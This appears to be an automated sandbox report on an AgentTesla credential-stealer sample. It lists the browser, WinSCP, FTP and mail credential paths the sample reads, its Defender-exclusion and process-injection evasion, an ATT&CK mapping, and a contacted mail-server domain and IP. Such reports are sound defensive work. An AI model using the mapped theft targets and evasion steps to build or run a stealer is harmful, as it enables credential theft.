                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Users\user\Desktop\ORDER#023_2024.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 5.2.ORDER#023_2024.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ORDER#023_2024.exe.3c384f0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ORDER#023_2024.exe.3c61510.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ORDER#023_2024.exe.3c384f0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.2903371766.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ORDER#023_2024.exe PID: 4268, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ORDER#023_2024.exe PID: 4268, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 5.2.ORDER#023_2024.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ORDER#023_2024.exe.3c384f0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ORDER#023_2024.exe.3c61510.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ORDER#023_2024.exe.3c384f0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.2903371766.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ORDER#023_2024.exe PID: 4268, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		111
                        Process Injection                        		1
                        Masquerading                        		2
                        OS Credential Dumping                        		111
                        Security Software Discovery                        		Remote Services1
                        Email Collection                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		1
                        Credentials in Registry                        		1
                        Process Discovery                        		Remote Desktop Protocol11
                        Archive Collected Data                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                        Virtualization/Sandbox Evasion                        		Security Account Manager141
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin Shares2
                        Data from Local System                        		1
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput Capture11
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets1
                        File and Directory Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                        Obfuscated Files or Information                        		Cached Domain Credentials24
                        System Information Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Software Packing                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568740 Sample: ORDER#023_2024.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 26 mail.mbarieservicesltd.com 2->26 30 Suricata IDS alerts for network traffic 2->30 32 Found malware configuration 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 8 other signatures 2->36 8 ORDER#023_2024.exe 4 2->8         started        signatures3 process4 file5 24 C:\Users\user\...\ORDER#023_2024.exe.log, ASCII 8->24 dropped 38 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->38 40 Adds a directory exclusion to Windows Defender 8->40 42 Injects a PE file into a foreign processes 8->42 12 ORDER#023_2024.exe 2 8->12         started        16 powershell.exe 23 8->16         started        18 ORDER#023_2024.exe 8->18         started        signatures6 process7 dnsIp8 28 mail.mbarieservicesltd.com 199.79.62.115, 49734, 587 PUBLIC-DOMAIN-REGISTRYUS United States 12->28 44 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->44 46 Tries to steal Mail credentials (via file / registry access) 12->46 48 Tries to harvest and steal ftp login credentials 12->48 50 Tries to harvest and steal browser information (history, passwords, etc) 12->50 52 Loading BitLocker PowerShell Module 16->52 20 WmiPrvSE.exe 16->20         started        22 conhost.exe 16->22         started        signatures9 process10

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        ORDER#023_2024.exe66%ReversingLabsWin32.Trojan.AgentTesla
                        ORDER#023_2024.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.carterandcone.coml0%Avira URL Cloudsafe
                        http://www.fontbureau.com0%Avira URL Cloudsafe
                        http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                        http://www.fontbureau.com/designers0%Avira URL Cloudsafe
                        http://www.tiro.com0%Avira URL Cloudsafe
                        http://www.urwpp.deDPlease0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mail.mbarieservicesltd.com
                        		199.79.62.115
                        		truefalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.comORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designersGORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/?ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bTheORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers?ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.tiro.comORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designersORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.goodfont.co.krORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.carterandcone.comlORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.sajatypeworks.comORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.typography.netDORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers/cabarga.htmlNORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/cTheORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/staff/dennis.htmORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cnORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/frere-user.htmlORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/DPleaseORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers8ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://localhost/arkanoid_server/requests.phpORDER#023_2024.exefalse
                                                            		high
                                                            http://www.fonts.comORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.sandoll.co.krORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.urwpp.deDPleaseORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.zhongyicts.com.cnORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameORDER#023_2024.exe, 00000000.00000002.1679554005.0000000002B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.sakkal.comORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://mail.mbarieservicesltd.comORDER#023_2024.exe, 00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      199.79.62.115
                                                                      		mail.mbarieservicesltd.comUnited States
                                                                      		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1568740
                                                                      Start date and time:2024-12-04 22:01:07 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 12s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:11
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:ORDER#023_2024.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@9/6@3/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 40
                                                                      • Number of non-executed functions: 11
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: ORDER#023_2024.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      16:01:56API Interceptor58x Sleep call for process: ORDER#023_2024.exe modified
                                                                      16:01:58API Interceptor18x Sleep call for process: powershell.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      199.79.62.115QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                                                        SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                                                          Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                                                            LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                  Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      INQ#84790.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        LPO24.0524.exeGet hashmaliciousAgentTeslaBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          mail.mbarieservicesltd.comQFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 199.79.62.115
                                                                                          SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 199.79.62.115
                                                                                          Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 199.79.62.115
                                                                                          LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          • 199.79.62.115
                                                                                          Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 199.79.62.115
                                                                                          Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 199.79.62.115
                                                                                          Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
